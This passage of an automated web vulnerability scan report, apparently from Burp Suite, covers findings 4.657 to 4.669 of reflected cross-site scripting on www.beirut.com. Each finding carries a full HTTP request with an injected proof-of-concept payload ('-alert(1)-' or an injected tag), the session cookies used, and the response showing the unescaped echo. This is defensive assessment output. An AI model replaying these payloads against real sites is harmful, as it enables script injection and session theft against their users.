Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet88c91'-alert(1)-'3a787f3de24/Tourism-and-Guides';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.657. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16a68'-alert(1)-'b1ef406af57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Tourism-and-Guides16a68'-alert(1)-'b1ef406af57/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Tourism-and-Guides16a68'-alert(1)-'b1ef406af57';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.658. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a22"><a>16f65d79cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet33a22"><a>16f65d79cc3/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:28:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet33a22"><a>16f65d79cc3">
...[SNIP]...

4.659. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d201f'-alert(1)-'9caddc414c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetd201f'-alert(1)-'9caddc414c0/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetd201f'-alert(1)-'9caddc414c0/Weather-Environment';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.660. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1631b'-alert(1)-'b7de9628bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Weather-Environment1631b'-alert(1)-'b7de9628bc4/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Weather-Environment1631b'-alert(1)-'b7de9628bc4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.661. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16db"><a>3891791e285 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsf16db"><a>3891791e285/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsf16db"><a>3891791e285">
...[SNIP]...

4.662. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97642'-alert(1)-'cd90dd512a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations97642'-alert(1)-'cd90dd512a0/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:25:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Recreations97642'-alert(1)-'cd90dd512a0/Amusement-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.663. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae02e'-alert(1)-'6d725f33c61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Amusement-Centersae02e'-alert(1)-'6d725f33c61/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Amusement-Centersae02e'-alert(1)-'6d725f33c61';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.664. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c4f'-alert(1)-'098af3f6f88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations65c4f'-alert(1)-'098af3f6f88/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations65c4f'-alert(1)-'098af3f6f88/Arcade-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.665. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff0f"><a>4cc49876d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsdff0f"><a>4cc49876d95/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsdff0f"><a>4cc49876d95">
...[SNIP]...

4.666. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c61a'-alert(1)-'8c9896bc0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Arcade-Centers2c61a'-alert(1)-'8c9896bc0d/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Arcade-Centers2c61a'-alert(1)-'8c9896bc0d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.667. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ba0"><a>b953a310f94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations79ba0"><a>b953a310f94/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:22:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations79ba0"><a>b953a310f94">
...[SNIP]...

4.668. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ffd6'-alert(1)-'fe7d3cb1e0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations4ffd6'-alert(1)-'fe7d3cb1e0b/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations4ffd6'-alert(1)-'fe7d3cb1e0b/Beach-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.669. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52d9'-alert(1)-'ed5bdbff3f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Beach-Clubsd52d9'-alert(1)-'ed5bdbff3f6/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Beach-Clubsd52d9'-alert(1)-'ed5bdbff3f6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

